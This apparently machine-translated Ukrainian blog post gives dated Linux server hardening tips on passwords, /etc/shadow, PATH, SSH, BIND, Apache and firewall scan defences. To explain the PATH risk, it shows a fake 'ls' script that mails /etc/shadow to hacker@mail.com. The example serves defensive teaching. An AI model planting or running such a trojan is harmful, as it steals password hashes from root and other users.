Я давно нічого не публікував у цьому блозі, і я хотів би поділитися з вами порадою, взятою з цієї книги ((Серед інших). Я знайшов його в університеті, і я просто читав, і хоча він, чесно кажучи, трохи застарів, і показані методи навряд чи спрацюють, враховуючи розвиток системи, це також цікаві аспекти, які можна показати.
Я хочу пояснити, що це поради, орієнтовані на систему Linux, яка використовується як сервер, у середньому або, можливо, великому масштабі, враховуючи, що на рівні користувача настільного ПК, хоча вони можуть бути застосовані, вони не були б дуже корисними.
Я також попереджаю, що це прості швидкі підказки, і я не буду вдаватися до деталей, хоча я планую зробити ще один набагато більш конкретний та обширний пост на певну тему. Але це я побачу пізніше. Давайте розпочнемо.
Політика щодо паролів.
Хоча це звучить як загальна фраза, наявність хорошої політики щодо паролів різницю між вразливою системою чи ні. Такі атаки, як "груба сила", використовують перевагу наявності неправильного пароля для доступу до системи. Найпоширеніші поради:
- Поєднуйте велику та малу літери.
- Використовуйте спеціальні символи.
- Числа.
- Більше 6 цифр (сподіваюся, більше 8).
На додаток до цього, давайте розглянемо два важливих файли. / etc / passwd та / etc / shadow.
Щось дуже важливим є те, що файл / etc / passwd. На додаток до надання нам імені користувача, його uid, шляху до папки, bash .. тощо. в деяких випадках він також показує зашифрований ключ користувача.
Давайте розглянемо його типовий склад.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
користувач: cryptkey: uid: gid: шлях :: шлях: bash
Справжня проблема тут полягає в тому, що цей конкретний файл має дозволи -rw-r - r– це означає, що він має дозволи на читання для будь-якого користувача в системі. і наявність зашифрованого ключа не дуже складно розібрати справжній.
Ось чому файл існує / etc / shadow. Це файл, в якому зберігаються, серед іншого, всі користувацькі ключі. Цей файл має необхідні дозволи, щоб жоден користувач не міг його прочитати.
Щоб це виправити, ми повинні перейти до файлу / etc / passwd і змінити зашифрований ключ на "х", це призведе до того, що ключ буде збережено лише у нашому файлі / etc / shadow.
desdelinux:x:500:501::/home/usuario1:/bin/bash
Проблеми з PATH та .bashrc та іншими.
Коли користувач виконує команду на своїй консолі, оболонка шукає цю команду в списку каталогів, що міститься у змінній середовища PATH.
Якщо ви введете "echo $ PATH" у консолі, він виведе щось подібне.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
У кожній із цих папок оболонка шукатиме команду, написану для її виконання. "." це означає, що першою папкою для пошуку є та сама папка, з якої виконується команда.
Припустимо, є користувач "Карлос", і він хоче "чинити зло". Цей користувач може залишити файл із назвою "ls" у своїй головній папці, і в цьому файлі виконати таку команду, як:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
І якщо користувач root для речей призначення, намагається перерахувати папки всередині папки carlos (оскільки спочатку шукає команду в тій самій папці, ненавмисно він буде відправляти файл із паролями на цей електронний лист, а потім папки був би внесений до списку, і він не дізнався б про це дуже пізно.
Щоб уникнути цього, ми повинні усунути "." змінної PATH.
Таким же чином файли, такі як /.bashrc, /.bashrc_profile, ./.login, повинні бути перевірені та перевірити, чи немає "." у змінній PATH, а насправді з файлів, подібних до цього, ви можете змінити пункт призначення певної команди.
Поради щодо послуг:
SHH
- Вимкніть версію 1 протоколу ssh у файлі sshd_config.
- Заборонити користувачу root-користувача входити за допомогою ssh.
- Файли та папки ssh_host_key, ssh_host_dsa_key та ssh_host_rsa_key повинен читати лише користувач root.
BIND
- Змініть привітальне повідомлення у файлі named.conf так, щоб воно не відображало номер версії
- Обмежуйте зони переказів і дозволяйте це лише тим командам, які цього потребують.
Apache
- Заборонити службі відображати вашу версію у вітальному повідомленні. Відредагуйте файл httpd.conf та додайте або змініть рядки:
ServerSignature Off
ServerTokens Prod
- Вимкнути автоматичне індексування
- Налаштуйте apache не обслуговувати такі конфіденційні файли, як .htacces, * .inc, * .jsp .. тощо
- Видаліть із сторінки службові сторінки або зразок
- Запустіть apache у середовищі chrooted
Безпека мережі.
Важливо охопити всі можливі записи до вашої системи із зовнішньої мережі, ось кілька важливих порад, щоб запобігти скануванню зловмисників та отриманню інформації з вашої мережі.
Блокувати ICMP-трафік
Брандмауер повинен бути налаштований на блокування всіх типів вхідного та вихідного трафіку ICMP та ехо-відповідей. Завдяки цьому ви уникаєте того, що сканер, який шукає підключене обладнання в діапазоні IP, знайде вас.
Уникайте сканування TCP-пінгу.
Одним із способів сканування вашої системи є сканування пінг-протоколу TCP. Припустимо, що на вашому сервері є сервер Apache на порту 80. Зловмисник може надіслати запит ACK на цей порт, при цьому, якщо система відреагує, комп'ютер буде живий і сканує решту портів.
Для цього ваш брандмауер завжди повинен мати опцію "обізнаність про стан" і повинен відкидати всі пакети ACK, які не відповідають вже встановленому TCP-з'єднанню або сеансу.
Кілька додаткових порад:
- Використовуйте системи IDS для виявлення сканування портів у вашій мережі.
- Налаштуйте брандмауер таким чином, щоб він не довіряв налаштуванням порту джерела підключення.
Це пов’язано з тим, що деякі скани використовують „фальшивий” вихідний порт, такий як 20 або 53, оскільки багато систем довіряють цим портам, оскільки вони є типовими для ftp або DNS.
Примітка: Пам'ятайте, що більшість проблем, зазначених у цій публікації, вже вирішені майже у всіх поточних дистрибутивах. Але ніколи не заважає мати ключову інформацію про ці проблеми, щоб вони не траплялися з вами.
Примітка: Пізніше я побачу конкретну тему і викладу допис із набагато більш детальною та актуальною інформацією.
Віддаю всім за читання.
Привіт.
Стаття мені дуже сподобалась, і я зацікавлена темою, закликаю продовжувати завантажувати вміст.